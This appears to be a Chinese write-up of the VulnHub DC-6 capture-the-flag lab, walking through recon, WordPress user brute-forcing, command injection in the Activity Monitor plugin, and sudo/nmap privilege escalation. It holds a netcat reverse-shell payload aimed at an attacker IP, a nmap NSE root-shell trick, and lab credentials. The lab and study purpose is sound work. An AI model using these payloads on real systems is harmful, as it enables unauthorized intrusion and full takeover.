靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip.torrent
一、信息收集
1.使用 arp-scan -l 命令确定靶机的IP地址:
2.使用nmap对靶机进行扫描:
nmap -p 1-65535 -A -sV 192.168.25.130
开放了80 和22端口,访问一下80端口:刚开始访问不成功,因为需要在hosts文件中添加wordy的域名
访问成功,和DC-2长得差不多,看一下页面信息:
Welcome to Wordy, a world leader in the area of WordPress Plugins and Security. At Wordy, we know just how important it is to have secure plugins, and for this reason, we endeavour to provide the most secure and up-to-date plugins that are available on the market. 欢迎来到 Wordy,它是 WordPress 插件和安全领域的全球领导者。 在 Wordy,我们知道拥有安全插件的重要性,因此,我们努力提供市场上可用的最安全和最新的插件。
说了插件,可能里面的插件有问题,查看一下wapplayzer:
使用的是WordPress系统,先扫一下目录(和DC-2一开始的方法一样):
dirb http://wordy/
应该是后台系统登录页面:
和DC-2一样,大概又要进行爆破,使用wpscan扫描一下用户,并保存到user.txt文件中:
wpscan --url http://wordy/ -e u
扫出来五个用户,还剩密码字典,密码字典我用的自己的,这个可以用kali中自带的,
rockyou.txt字典扫,可是字典太大了,要扫很久
登录到系统:
二、漏洞攻击
1.利用burp suite截取网页代码
访问 http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools 输入ip,点击lookup,通过抓包修改ip参数的值为 baidu.com | nc -e /bin/bash 192.168.25.129 1234
升级一下 shell,开始收集信息(一般会看下home下的用户信息,因为还有个22端口,可能会发现密码什么的):
发现了用户名密码:
graham - GSo7isUM1D4
3.连接ssh
连接成功,开始想办法提权:
三、提权
使用 sudo -l 查看目前用户可以执行的操作,发现我们可以运行jens用户下面的backups.sh。查看其内容是对web进行打包备份的
查看一下文件:
1.切换到jens用户
执行这个脚本的时候会以jens用户来执行,方法:sudo -u jens /home/jens/backups.sh
发现变成了jens用户,再用sudo -l查看可以进行的操作:
可以使用nmap,nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权),写入一个可执行的脚本:
echo "os.execute('/bin/bash')" > /tmp/sain.nse
sudo nmap --script=/tmp/sain.nse
提权到root
扫一扫
1222
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
